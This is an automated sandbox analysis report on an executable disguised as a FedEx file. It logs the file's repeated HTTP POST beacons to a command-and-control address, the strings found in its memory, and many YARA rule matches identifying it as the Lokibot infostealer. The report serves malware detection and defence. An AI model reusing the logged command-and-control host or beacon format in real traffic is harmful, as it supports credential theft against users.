                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_00404ED4 recv,3_2_00404ED4
                Source: unknownHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 192Connection: close
                Source: FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.61.137.215/index.php/comments/feed/
                Source: FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.61.137.215/index.php/feed/
                Source: FedEx_776282383902.exe, 00000003.00000002.2465400980.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.61.137.215/index.php/t?id=090
                Source: FedEx_776282383902.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: FedEx_776282383902.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: FedEx_776282383902.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: FedEx_776282383902.exe, FedEx_776282383902.exe, 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                Source: FedEx_776282383902.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                System Summary

                barindex
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: FedEx_776282383902.exe PID: 6192, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_012CD2E40_2_012CD2E4
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_014900400_2_01490040
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_014900060_2_01490006
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_014922300_2_01492230
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_014900400_2_01490040
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_01493F980_2_01493F98
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_061947580_2_06194758
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_06193BF80_2_06193BF8
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_061989000_2_06198900
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_061936480_2_06193648
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_061936470_2_06193647
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_061947480_2_06194748
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_0619B5530_2_0619B553
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_0619D0C80_2_0619D0C8
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_0619CC900_2_0619CC90
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_0619DA780_2_0619DA78
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_06193BE80_2_06193BE8
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_061988F00_2_061988F0
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 0_2_0619B9900_2_0619B990
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_0040549C3_2_0040549C
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_004029D43_2_004029D4
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: String function: 00405B6F appears 42 times
                Source: FedEx_776282383902.exeStatic PE information: invalid certificate
                Source: FedEx_776282383902.exe, 00000000.00000002.1217569536.00000000012DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FedEx_776282383902.exe
                Source: FedEx_776282383902.exe, 00000000.00000002.1218835843.00000000042D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs FedEx_776282383902.exe
                Source: FedEx_776282383902.exe, 00000000.00000002.1220838807.0000000007D90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs FedEx_776282383902.exe
                Source: FedEx_776282383902.exe, 00000000.00000002.1220582421.0000000007638000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs FedEx_776282383902.exe
                Source: FedEx_776282383902.exe, 00000000.00000002.1218835843.0000000004354000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs FedEx_776282383902.exe
                Source: FedEx_776282383902.exeBinary or memory string: OriginalFilenameKOqs.exe" vs FedEx_776282383902.exe
                Source: FedEx_776282383902.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
